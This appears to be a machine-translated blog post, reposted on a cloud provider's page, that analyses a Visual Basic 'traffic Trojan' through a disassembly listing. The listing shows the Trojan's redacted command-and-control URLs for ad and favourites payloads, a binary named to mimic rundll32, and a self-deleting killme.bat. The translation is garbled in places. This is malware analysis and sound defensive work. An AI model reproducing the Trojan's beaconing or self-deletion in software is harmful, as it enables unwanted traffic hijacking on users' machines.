Analysis on the traffic volume of a fake website

Source: Internet
Author: User

After the system patch is completed, the online blind irrigation is still connected to www.net.cn. now .... put down his network horse, 8 error, really good. kill 98. nt.2000.xp. xpsp2.2003. I kept it myself and analyzed his Trojan. A traffic Trojan. Server. Now all the ponies are here.
Slightly shelled, written in VB.
00403DAD. FF15 54104000 call dword ptr ds: [<& msvbvm60. _ vbaHresu>; msvbvm60. _ vbaHresultCheckObj
00403DB3. 8985 E0FCFFFF mov dword ptr ss: [EBP-320], EAX
00403DB9. EB 0A jmp short Rundll32.00403DC5
00403DBB> C785 E0FCFFFF> mov dword ptr ss: [EBP-320], 0
00403DC5> 8B95 60 feffff mov edx, dword ptr ss: [EBP-1A0]
00403DCB. 8995 F8FCFFFF mov dword ptr ss: [EBP-308], EDX
00403DD1. C785 60 FEFFFF> mov dword ptr ss: [EBP-1A0], 0
00403DDB. 8B85 F8FCFFFF mov eax, dword ptr ss: [EBP-308]
00403DE1. 8985 34 feffff mov dword ptr ss: [EBP-1CC], EAX
00403DE7. C785 2 CFEFFFF> mov dword ptr ss: [EBP-1D4], 8
00403DF1. 8D95 2 cfeffff lea edx, dword ptr ss: [EBP-1D4]
00403DF7. 8D8D F8FEFFFF lea ecx, dword ptr ss: [EBP-108]
00403DFD. FF15 08104000 call dword ptr ds: [<& msvbvm60. _ vbaVarMo>; msvbvm60. _ vbaVarMove
00403E03. C745 FC 06000> mov dword ptr ss: [EBP-4], 6
00403E0A. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adset.txt"
00403E14. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E1E. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E24. 8D4D A0 lea ecx, dword ptr ss: [EBP-60]
00403E27. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E2D. C745 FC 07000> mov dword ptr ss: [EBP-4], 7
00403E34. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E48. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E4E. 8D8D 6 cffffff lea ecx, dword ptr ss: [EBP-94]
00403E54. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E5A. C745 FC 08000> mov dword ptr ss: [EBP-4], 8
00403E61. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE "asp" target = _ blank>Http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E75. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E7B. 8D4D 8C lea ecx, dword ptr ss: [EBP-74]
00403E7E. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E84. C745 FC 09000> mov dword ptr ss: [EBP-4], 9
00403E8B. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E9F. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403EA5. 8D8D B8FEFFFF lea ecx, dword ptr ss: [EBP-148]
00403EAB. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403EB1. C745 FC 0A000> mov dword ptr ss: [EBP-4], 0A
00403EB8. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403ECC. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403ED2. 8D8D 7 cffffff lea ecx, dword ptr ss: [EBP-84]
00403ED8. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403EDE. C745 FC 0B000> mov dword ptr ss: [EBP-4], 0B
00403EE5. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE "WinDir"
00403EEF. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403EF9. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403EFF. 8D8D 2 cfeffff lea ecx, dword ptr ss: [EBP-1D4]
00403F05. FF15 6C114000 call dword ptr ds: [<& msvbvm60. _ vbaVarDu>; msvbvm60. _ vbaVarDup
00403F0B. 8D8D 2 cfeffff lea ecx, dword ptr ss: [EBP-1D4]
00403F11. 51 PUSH ECX
00403F12. 8D95 1 cfeffff lea edx, dword ptr ss: [EBP-1E4]
00403F18. 52 PUSH EDX
00403F19. FF15 60104000 call dword ptr ds: [<& msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F. C785 C4FDFFFF> mov dword ptr ss: [EBP-23C], Rundll32.0040>; UNICODE "undll32.exe"
00403F29. C785 BCFDFFFF> mov dword ptr ss: [EBP-244], 8

The program willHttp://www.xxxxxxxx.comAnd access tc/MMResult. asp.

Generate a file
00404DA2./EB 0A jmp short Rundll32.00404DAE // obtain the file path Stack
00404DA4> | C785 88 FCFFFF> mov dword ptr ss: [EBP-378], 0
00404DAE> 8B85 60 feffff mov eax, dword ptr ss: [EBP-1A0] // my program path is "D: fuck you"
00404DB4. 50 push eax // path to eax
00404DB5. 68 80274000 PUSH Rundll32.00402780; // generate killme. bat
00404DBA. FF15 48104000 call dword ptr ds: [<& msvbvm60. _ vbaStrCat>; msvbvm60. _ vbaStrCat
00404DC0. 8BD0 mov edx, EAX // file path + file name D: fuck youkillme. bat
00404DC2. 8D8D 5 cfeffff lea ecx, dword ptr ss: [EBP-1A4]
00404DC8. FF15 80114000 call dword ptr ds: [<& msvbvm60. _ vbaStrMov>; msvbvm60. _ vbaStrMove
00404DCE. 50 PUSH EAX
00404DCF. 6A 01 PUSH 1
00404DD1. 6A ff push-1
00404DD3. 6A 02 PUSH 2
00404DD5. FF15 28114000 call dword ptr ds: [<& msvbvm60. _ vbaFileOp>; msvbvm60. _ vbaFileOpen
00404DDB. 8D8D 5 cfeffff lea ecx, dword ptr ss: [EBP-1A4]
00404DE1. 51 PUSH ECX
00404DE2. 8D95 60 feffff lea edx, dword ptr ss: [EBP-1A0]
00404DE8. 52 PUSH EDX
00404DE9. 6A 02 PUSH 2
00404DEB. FF15 48114000 call dword ptr ds: [<& msvbvm60. _ vbaFreeSt>; msvbvm60. _ vbaFreeStrList
00404DF1. 83C4 0C add esp, 0C
00404DF4. 8D8D 40 feffff lea ecx, dword ptr ss: [EBP-1C0]
00404DFA. FF15 A8114000 call dword ptr ds: [<& msvbvm60. _ vbaFreeOb>; msvbvm60. _ vbaFreeObj
00404E00. C745 FC 23000> mov dword ptr ss: [EBP-4], 23
00404E07. 68 9C274000 PUSH Rundll32.0040279C; @ echo off
00404E0C. 6A 01 PUSH 1
00404E0E. 68 B4274000 PUSH Rundll32.004027B4

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.